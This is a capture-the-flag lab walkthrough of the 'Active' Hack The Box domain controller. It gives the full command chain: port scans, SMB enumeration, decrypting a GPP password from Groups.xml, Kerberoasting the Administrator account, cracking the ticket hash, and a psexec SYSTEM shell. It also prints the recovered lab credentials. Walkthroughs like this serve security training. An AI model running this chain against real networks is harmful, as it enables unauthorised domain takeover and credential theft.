Active
SMB info leak, GPP, Kerberoast
- LHOST: 10.10.14.15
- RHOST: 10.129.135.20
Port scan:
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Script scan:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-09 14:08:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-07-09T14:09:11
|_ start_date: 2022-07-09T14:05:50
Full scan:
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49169/tcp open unknown
49171/tcp open unknown
49177/tcp open unknown
Making a script scan on extra ports: 5722, 9389, 47001, 49169, 49171, 49177
PORT STATE SERVICE VERSION
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49169/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
49177/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Enumerate SMB shares:
$ smbmap -H $IP
[+] IP: 10.129.135.20:445 Name: 10.129.135.20
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
Recursively list directories and files in the share
\Replication:smbmap -H $IP -R Replication --depth 10
Note that the
--depth flag is needed, otherwise we won't find the thing we want. Here we found an interesting file named Groups.xml:
Groups.xml
Download
Groups.xml to Kali:smbmap -H $IP -R Replication --depth 10 -A Groups.xml -q
In
Groups.xml, we found a username active.htb\SVC_TGS and a GPP password in the cpassword field:edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPP password can be easily decrypted with Kali built-in
gpp-decrypt tool:gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
The plaintext password is
GPPstillStandingStrong2k18. To learn the theory of this attack, read the following post:Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
Active Directory Security
Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
Enumerate the SMB shares again with the credential we just obtained:
$ smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18'
[+] IP: 10.129.135.20:445 Name: 10.129.135.20
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
Replication READ ONLY
SYSVOL READ ONLY Logon server share
Users READ ONLY
Recursively list directories and files in the share
\Users:smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users --depth 10
Here we found
user.txt. Download it to Kali:smbmap -H $IP -d 'active.htb' -u 'SVC_TGS' -p 'GPPstillStandingStrong2k18' -R Users --depth 10 -A user.txt -q
Now we have a valid username
SVC_TGS and its plaintext password GPPstillStandingStrong2k18. In such scenario, we can try Kerberoast in order to get a TGS ticket and crack it offline. To learn the theory behind Kerberoast, read the following post:How To Attack Kerberos 101
m0chan Blog - Info Sec, CTF & Hacking
How To Attack Kerberos 101
Do kerberoast with GetUserSPNS:
$ impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip $IP -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2022-07-09 10:06:56.849348
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$cff428e912c5afd03d8a2eb0aedfd97b$0b418bf29e27f1495c342e8a8be1bf0882f1a0c50c4e11971114f0221f54177dd5d1309936fdd123e087edef99ba2686cfae610d754fdd0d1abb35b718eb9604f66446c886bd468591aae0d229ece0935dcbd67187656f2e2ae6c5a0d52b2822dacdc2aff41554ce63e4ab76deb5fbe0488efea8371c5aae296bcd4db4cdbfb9372a199d72bba3d8bc14de863c48a581ca3e6e390aa2e1df01d7cacf000b3a70a764beafb01981e4af936dadb31fa173482a98c31081f96a763bad17c54602e411ed6851d432d2a124267fba0ab962ae9ca441133018051288f52376709e5420fee498f17e8e6eed20116a3075e284dcb06e7a4aed71804321c4743dfcf4a9277a93709863579380393ac206f3f45636fd30c78779a51b8b8bd2a49a2beab2dc2d0be832cc10623da976ae9dd9ce8c3a8d78e8af3bf9119b5486374914ea53b912e45e1b3c794712d407333cf1b570adfac84e3436f359ea5d3af494721d8dd5224bb7833a78b86b2858f34c17911e67aaa8448a34891c8fa595ac183fb8f4ca3de974af002a0eb1cea6a6dc69c1cab81381b4b5d067ee79d5c6afd69f60a501b07685059bb515eeb9e13f9dbd6ef13410f06e92c697706680766af6878b7ad230bfb9df5224f3d7db9ac160d91b719fd506b2af28533ec9e7c30151b86cc80a9afb33f623bb9859efcb16c9a2d78e92d545450c7bf6dad4dda042ab267e3557f1b144a36411666ddaf078707b09567c19cf505bfb3da72d50d2317f5610597855376965201285ab1818db0bde667f02c266f9a559492687d2e99b5f930ce4d190d80ac123877f283ee33f6f4819de904a42d0891fc7f6dd6cc067891d5aa95b0ff4ecdd0550ee8546dce2859410415a743b835cefef97b0fb809345448a49f53fb2b77efd9349e3aa47dfd0af266e35f07c22b6d2af022f7b6ec81477bcbb7b3de03a4d35810e3c50da0ad6aafa107e854b31dccfc95f2670305863f8625ecaecd5ab4b80afcfc81a0ff6b6e4d8fc0cd91ff8c7c40a0eeee29c1df1ce1f7fa091ff4819afb2b26ab49180efe9b5c199051eb03115ffee9be164aba38ce90f9defef6c76fc962d360cdf2a55734a1c5f874032e2e39c898e104973c789144f176f1c47c693c5e7bfc2e65df72269b3fdcbf863db4432c4ea7daa71be172e97b061aa83e35efb39d0dcf84e7d4c28675e4e0041fb63d63b0f7e32e29fdb00e93259aa8c504200c817b946f53f32f32a8091cd5650edfd39184a28
Save the TGS ticket to a file named
hash.txt:impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip $IP -request -outputfile hash.txt
Crack the TGS ticket with John:
john-rockyou hash.txt
The plaintext password is
Ticketmaster1968:
John
PsExec to SYSTEM shell:
impacket-psexec active.htb/Administrator:Ticketmaster1968@$IP
SYSTEM shell
Last modified 1yr ago